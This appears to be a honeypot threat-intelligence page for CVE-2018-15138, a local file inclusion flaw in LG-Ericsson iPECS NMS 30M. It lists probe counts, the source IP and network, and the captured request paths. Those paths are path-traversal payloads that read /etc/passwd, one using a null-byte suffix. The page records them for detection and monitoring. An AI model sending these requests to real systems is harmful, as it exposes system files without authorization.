CVE-2018-15138: LG-Ericsson iPECS NMS 30M - Local File Inclusion

HoneyLabs honeypots recorded 2 probes matching CVE-2018-15138 from 1 distinct source IP addresses in the last 7 days. Severity is rated high.

Request paths that identify it

  • /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg
  • /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data

Addresses probing it

Source IPProbesNetworkCountry
93.123.109.2142Techoff Srv LimitedBulgaria

Networks it comes from

ASNOrganisationProbesSource IPs
AS48090Techoff Srv Limited21

Captured requests

  • /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data
  • /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg

CVE report

CVE report

Open a specific CVE from the CVE tracker.